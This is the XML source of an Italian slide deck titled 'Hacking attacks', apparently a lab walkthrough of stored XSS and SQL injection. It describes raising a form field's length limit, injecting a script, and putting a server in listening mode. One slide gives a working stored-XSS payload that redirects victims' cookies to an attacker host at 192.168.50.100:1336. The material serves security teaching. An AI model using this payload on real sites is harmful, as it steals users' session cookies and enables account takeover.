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x="18288000" cy="10287000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="HK Modular" charset="1" panose="00000800000000000000"/>
      <p:regular r:id="rId29"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans Bold" charset="1" panose="020B0806030504020204"/>
      <p:regular r:id="rId30"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans" charset="1" panose="020B0606030504020204"/>
      <p:regular r:id="rId31"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans Bold Italics" charset="1" panose="020B0806030504020204"/>
      <p:regular r:id="rId32"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans Italics" charset="1" panose="020B0606030504020204"/>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jpeg>
</file>

<file path=ppt/media/image3.svg>
</file>

<file path=ppt/media/image30.jpeg>
</file>

<file path=ppt/media/image31.png>
</file>

<file path=ppt/media/image32.png>
</file>

<file path=ppt/media/image33.jpeg>
</file>

<file path=ppt/media/image34.png>
</file>

<file path=ppt/media/image35.png>
</file>

<file path=ppt/media/image36.png>
</file>

<file path=ppt/media/image4.png>
</file>

<file path=ppt/media/image5.svg>
</file>

<file path=ppt/media/image6.pn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1.pn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 Id="rId6" Target="../media/image23.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId7" Target="../media/image24.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId8" Target="../media/image25.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId9" Target="../media/image2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7.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId4" Target="../media/image28.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image29.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0.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId4" Target="../media/image28.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image3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0.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId4" Target="../media/image28.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image3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3.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3.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3.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5.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 Id="rId6" Target="https://www.acunetix.com/websitesecurity/xss/" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId7" Target="https://www.splunk.com/en_us/blog/learn/cross-site-scripting-xss-attacks.html"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12.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="https://www.splunk.com/en_us/blog/learn/cross-site-scripting-xss-attacks.html" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId7" Target="https://www.splunk.com/en_us/blog/learn/cross-site-scripting-xss-attacks.html" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId8" Target="https://www.infosecinstitute.com/resources/security-awareness/owasp-3-cross-site-scripting-xss/" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/></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13.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="https://www.acunetix.com/websitesecurity/xss/" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId7" Target="https://www.infosecinstitute.com/resources/security-awareness/owasp-3-cross-site-scripting-xss/" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/></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4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-527451" y="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2709489" y="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5946429" y="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9183368" y="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2420308" y="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15657248" y="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0" id="10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="3974543" y="6416501"/>
            <a:ext cx="10338913" cy="650327"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2723006" cy="171280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 11" id="11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="2723006" cy="171280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="171280" w="2723006">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2723006" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2723006" y="171280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="171280"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 12" id="12"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-57150"/>
              <a:ext cx="2723006" cy="228430"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2659"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 13" id="13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="7446016" y="7447829"/>
            <a:ext cx="3395968" cy="700419"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="700419" w="3395968">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3395968" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3395968" y="700418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7004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4" id="14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="17488106" y="9502973"/>
            <a:ext cx="402082" cy="402082"/>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16" id="1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17" id="17"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1209590" y="38760"/>
            <a:ext cx="16026760" cy="4022142"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="16163"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="11545">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Modular"/>
                <a:ea typeface="HK Modular"/>
                <a:cs typeface="HK Modular"/>
                <a:sym typeface="HK Modular"/>
              </a:rPr>
              <a:t>Hacking      att  cks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3935175" y="6595335"/>
            <a:ext cx="10338913" cy="297180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2519"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1799" spc="1439">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>XSS STORED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1799" spc="1439">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1799" spc="1439">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>SQL INJECTION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="7406647" y="7599675"/>
            <a:ext cx="3395968" cy="349101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" spc="376">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>START SLIDE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>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21" id="21"/>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01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="546856" y="9595504"/>
            <a:ext cx="1659828" cy="198119"/>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F3RBU5 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="6701211" y="2631114"/>
            <a:ext cx="4806841" cy="3785387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3785387" w="4806841">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4806841" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4806841" y="3785387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3785387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>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7" id="7"/>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8" id="8"/>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10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 9" id="9"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 10" id="10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1867447" y="1835644"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9519675" cy="4185675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 11" id="11"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="0" t="52207" r="0" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="9519675" cy="4185675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 12" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1867447" y="5312099"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1754225" cy="771309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 13" id="13"/>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4" id="14"/>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5" id="15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9280796" y="1835644"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1754225" cy="771309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 16" id="16"/>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7" id="17"/>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8" id="18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9280796" y="5312099"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9519675" cy="4185675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 19" id="19"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="0" t="0" r="0" b="52207"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="9519675" cy="4185675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 20" id="20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1476431" y="1409727"/>
            <a:ext cx="782032" cy="1903146"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="1354120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 21" id="21"/>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22" id="22"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 23" id="23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="16029537" y="6967452"/>
            <a:ext cx="782032" cy="1903146"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="1354120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 24" id="24"/>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25" id="25"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4178822" y="6517719"/>
            <a:ext cx="4295387" cy="1369060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>A questo punto possiamo inserire il nostro script senza che venga troncato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>&lt;script&gt;window.location='http://192.168.50.100:1336/cookie='+document.cookie&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 27" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4178822" y="5977608"/>
            <a:ext cx="2788414" cy="339725"/>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Inserimento Script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 28" id="28"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2464800" y="5685355"/>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06</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 29" id="29"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9878149" y="2208901"/>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05</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 30" id="30"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11279280" y="2294626"/>
            <a:ext cx="4908877" cy="692150"/>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Modifica lunghezza massima del box Message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 31" id="31"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11279280" y="3126631"/>
            <a:ext cx="4295387" cy="264160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Modificare i caratteri massimi come in figura</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="u"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 2" id="2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1723634" y="2240843"/>
            <a:ext cx="15686547" cy="3271772"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="20915395" cy="4362363"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 3" id="3"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:srcRect l="0" t="11832" r="0" b="9054"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="20915395" cy="4362363"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>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3">
              <a:alphaModFix amt="15000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="17019165" y="1028700"/>
            <a:ext cx="782032" cy="1903146"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="1354120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 6" id="6"/>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7" id="7"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 8" id="8"/>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3">
              <a:alphaModFix amt="15000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="17488106" y="9502973"/>
            <a:ext cx="402082" cy="402082"/>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11" id="11"/>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12" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1283951" y="6027180"/>
            <a:ext cx="782032" cy="1903146"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="1354120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 13" id="13"/>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14" id="14"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 15" id="15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1572753" y="6471916"/>
            <a:ext cx="15686547" cy="2170858"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4131436" cy="571748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 16" id="16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="4131436" cy="571748"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="571748" w="4131436">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4131436" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131436" y="571748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="571748"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 17" id="17"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="4131436" cy="600323"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>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9" id="19"/>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11</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>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21" id="21"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2065983" y="6963384"/>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07</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3467114" y="6639028"/>
            <a:ext cx="4908877" cy="339725"/>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Messa in ascolto del Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3707043" y="7272865"/>
            <a:ext cx="11417967" cy="540385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
